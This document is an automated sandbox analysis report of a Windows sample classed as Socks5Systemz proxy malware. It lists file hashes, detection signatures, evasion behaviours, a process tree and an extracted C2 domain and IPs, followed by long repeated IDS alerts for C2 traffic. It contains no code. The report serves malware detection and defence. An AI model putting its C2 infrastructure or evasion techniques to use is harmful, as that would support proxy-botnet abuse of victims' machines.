Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1520633
MD5:	5f3d49bffed0da5d969582bd92fed715
SHA1:	6efbd680de90af1c2ac13eb1a781b3797f6714e4
SHA256:	a166a398a327a98b73d33c3ffd0ae68ae1538a79678e4e16c5977aadfa46a395
Tags:	exeuser-Bitsight
Infos:

Detection

Socks5Systemz

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Socks5Systemz

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to infect the boot sector

Machine Learning detection for dropped file

PE file has a writeable .text section

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5F3D49BFFED0DA5D969582BD92FED715)

file.tmp (PID: 6312 cmdline: "C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe" MD5: 499BD324F6DD0DF600B61BE36E26B612)

gerdaplay3se.exe (PID: 4052 cmdline: "C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -i MD5: D9BDC42F41BCE78D0C9D0FB3AC33D0DF)

cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["ceyqbgr.net"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
Process Memory Space: gerdaplay3se.exe PID: 4052	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security

Suricata Signatures

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T17:31:53.456689+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57519	185.208.158.248	80	TCP
2024-09-27T17:31:56.349470+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57519	185.208.158.248	80	TCP
2024-09-27T17:31:56.885180+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57519	185.208.158.248	80	TCP
2024-09-27T17:31:58.025467+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57522	185.208.158.248	80	TCP
2024-09-27T17:31:59.024528+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57523	185.208.158.248	80	TCP
2024-09-27T17:31:59.852769+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57524	185.208.158.248	80	TCP
2024-09-27T17:32:00.689985+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:01.039539+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:01.393119+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:01.913473+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:02.267509+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57526	185.208.158.248	80	TCP
2024-09-27T17:32:03.067039+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57527	185.208.158.248	80	TCP
2024-09-27T17:32:03.418240+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57527	185.208.158.248	80	TCP
2024-09-27T17:32:04.272954+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57528	185.208.158.248	80	TCP
2024-09-27T17:32:05.215372+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57529	185.208.158.248	80	TCP
2024-09-27T17:32:06.018644+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57530	185.208.158.248	80	TCP
2024-09-27T17:32:06.373694+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57530	185.208.158.248	80	TCP
2024-09-27T17:32:07.205985+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57531	185.208.158.248	80	TCP
2024-09-27T17:32:08.108983+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57532	185.208.158.248	80	TCP
2024-09-27T17:32:08.923277+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57533	185.208.158.248	80	TCP
2024-09-27T17:32:09.753087+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57534	185.208.158.248	80	TCP
2024-09-27T17:32:10.885803+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57535	185.208.158.248	80	TCP
2024-09-27T17:32:11.795330+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57536	185.208.158.248	80	TCP
2024-09-27T17:32:12.695074+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57537	185.208.158.248	80	TCP
2024-09-27T17:32:13.253377+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57537	185.208.158.248	80	TCP
2024-09-27T17:32:14.187113+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57538	185.208.158.248	80	TCP
2024-09-27T17:32:15.019151+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57539	185.208.158.248	80	TCP
2024-09-27T17:32:15.855427+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57540	185.208.158.248	80	TCP
2024-09-27T17:32:16.706911+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57541	185.208.158.248	80	TCP
2024-09-27T17:32:17.056712+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57541	185.208.158.248	80	TCP
2024-09-27T17:32:17.927819+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57543	185.208.158.248	80	TCP
2024-09-27T17:32:18.382123+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57543	185.208.158.248	80	TCP
2024-09-27T17:32:18.733642+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57543	185.208.158.248	80	TCP
2024-09-27T17:32:19.582795+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57544	185.208.158.248	80	TCP
2024-09-27T17:32:19.931095+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57544	185.208.158.248	80	TCP
2024-09-27T17:32:20.791335+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57545	185.208.158.248	80	TCP
2024-09-27T17:32:21.648710+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57547	185.208.158.248	80	TCP
2024-09-27T17:32:22.019903+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57547	185.208.158.248	80	TCP
2024-09-27T17:32:22.948397+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57548	185.208.158.248	80	TCP
2024-09-27T17:32:23.788572+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57549	185.208.158.248	80	TCP
2024-09-27T17:32:24.221834+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57549	185.208.158.248	80	TCP
2024-09-27T17:32:24.572523+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57549	185.208.158.248	80	TCP
2024-09-27T17:32:25.416569+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57550	185.208.158.248	80	TCP
2024-09-27T17:32:26.238460+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57551	185.208.158.248	80	TCP
2024-09-27T17:32:26.620409+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57551	185.208.158.248	80	TCP
2024-09-27T17:32:27.662406+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57552	185.208.158.248	80	TCP
2024-09-27T17:32:28.011305+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57552	185.208.158.248	80	TCP
2024-09-27T17:32:28.894011+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57553	185.208.158.248	80	TCP
2024-09-27T17:32:29.250014+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57553	185.208.158.248	80	TCP
2024-09-27T17:32:30.081909+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57554	185.208.158.248	80	TCP
2024-09-27T17:32:30.439564+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57554	185.208.158.248	80	TCP
2024-09-27T17:32:31.293799+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57555	185.208.158.248	80	TCP
2024-09-27T17:32:32.209370+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57556	185.208.158.248	80	TCP
2024-09-27T17:32:32.559173+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57556	185.208.158.248	80	TCP
2024-09-27T17:32:33.392448+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57557	185.208.158.248	80	TCP
2024-09-27T17:32:34.215126+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57558	185.208.158.248	80	TCP
2024-09-27T17:32:35.049986+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57559	185.208.158.248	80	TCP
2024-09-27T17:32:35.411257+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57559	185.208.158.248	80	TCP
2024-09-27T17:32:35.763988+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57559	185.208.158.248	80	TCP
2024-09-27T17:32:36.594047+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57560	185.208.158.248	80	TCP
2024-09-27T17:32:37.422418+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57561	185.208.158.248	80	TCP
2024-09-27T17:32:38.261246+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57562	185.208.158.248	80	TCP
2024-09-27T17:32:39.289194+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57563	185.208.158.248	80	TCP
2024-09-27T17:32:40.123339+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57564	185.208.158.248	80	TCP
2024-09-27T17:32:40.924876+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57565	185.208.158.248	80	TCP
2024-09-27T17:32:41.880651+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57566	185.208.158.248	80	TCP
2024-09-27T17:32:42.250934+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57566	185.208.158.248	80	TCP
2024-09-27T17:32:43.068978+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57567	185.208.158.248	80	TCP
2024-09-27T17:32:43.421271+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57567	185.208.158.248	80	TCP
2024-09-27T17:32:47.253485+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57568	185.208.158.248	80	TCP
2024-09-27T17:32:47.601827+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57568	185.208.158.248	80	TCP
2024-09-27T17:32:47.946316+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57568	185.208.158.248	80	TCP
2024-09-27T17:32:48.796979+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57570	185.208.158.248	80	TCP
2024-09-27T17:32:49.614077+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57571	185.208.158.248	80	TCP
2024-09-27T17:32:49.962516+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57571	185.208.158.248	80	TCP
2024-09-27T17:32:50.807144+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57572	185.208.158.248	80	TCP
2024-09-27T17:32:51.669495+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57573	185.208.158.248	80	TCP
2024-09-27T17:32:52.719678+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57574	185.208.158.248	80	TCP
2024-09-27T17:32:53.621360+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57575	185.208.158.248	80	TCP
2024-09-27T17:32:54.453355+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57576	185.208.158.248	80	TCP
2024-09-27T17:32:55.380008+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57577	185.208.158.248	80	TCP
2024-09-27T17:32:56.275356+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57578	185.208.158.248	80	TCP
2024-09-27T17:32:57.202034+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57579	185.208.158.248	80	TCP
2024-09-27T17:32:58.046291+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57580	185.208.158.248	80	TCP
2024-09-27T17:32:58.953477+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57581	185.208.158.248	80	TCP
2024-09-27T17:32:59.949927+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57582	185.208.158.248	80	TCP
2024-09-27T17:33:00.772029+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57583	185.208.158.248	80	TCP
2024-09-27T17:33:01.633142+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57584	185.208.158.248	80	TCP
2024-09-27T17:33:02.493932+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57585	185.208.158.248	80	TCP
2024-09-27T17:33:03.387368+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57586	185.208.158.248	80	TCP
2024-09-27T17:33:04.249909+0200	2049467	1	A Network Trojan was detected	192.168.2.6	57587	185.208.158.248	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: gerdaplay3se.exe.4052.3.memstrmin

Malware Configuration Extractor: Socks5Systemz {"C2 list": ["ceyqbgr.net"]}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Eclipse IO Library 9.27.43\Eclipse IO Library 9.27.43.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045D230 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,	1_2_0045D230
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045D2E4 ArcFourCrypt,	1_2_0045D2E4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0045D2FC ArcFourCrypt,	1_2_0045D2FC
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_10001000 ISCryptGetVersion,	1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_10001130 ArcFourCrypt,	1_2_10001130

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Unpacked PE file: 3.2.gerdaplay3se.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:	Binary string: msvcp71.pdbx# source: is-RDVP8.tmp.1.dr
Source:	Binary string: msvcr71.pdb< source: is-8SV2U.tmp.1.dr
Source:	Binary string: F:\Temp\openssl-1.1.1t\libssl-1_1.pdb source: is-UG21C.tmp.1.dr
Source:	Binary string: msvcp71.pdb source: is-RDVP8.tmp.1.dr
Source:	Binary string: msvcr71.pdb source: is-8SV2U.tmp.1.dr

Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00452AD4 FindFirstFileA,GetLastError,	1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004753C4 FindFirstFileA,FindNextFileA,FindClose,	1_2_004753C4
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00464200 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00464200
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_0049877C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	1_2_0049877C
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_004627F8 FindFirstFileA,FindNextFileA,FindClose,	1_2_004627F8
Source: C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp	Code function: 1_2_00463D84 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	1_2_00463D84

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57522 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57523 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57519 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57526 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57528 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57524 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57580 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57548 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57529 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57550 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57573 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57555 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57583 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57531 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57557 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57543 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57553 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57537 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57565 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57554 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57577 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57574 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57567 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57559 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57533 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57581 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57575 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57564 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57527 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57584 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57582 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57536 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57530 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57538 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57535 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57534 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57541 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57532 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57576 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57551 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57560 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57540 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57544 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57587 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57556 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57562 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57561 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57539 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57552 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57563 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57578 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57566 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57571 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57545 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57547 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57558 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57585 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57549 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57570 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57572 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57586 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57568 -> 185.208.158.248:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.6:57579 -> 185.208.158.248:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: ceyqbgr.net

Source: global traffic

TCP traffic: 192.168.2.6:57520 -> 89.105.201.183:2023

Source: Joe Sandbox View	IP Address: 185.208.158.248 185.208.158.248
Source: Joe Sandbox View	IP Address: 89.105.201.183 89.105.201.183

Source: Joe Sandbox View

ASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
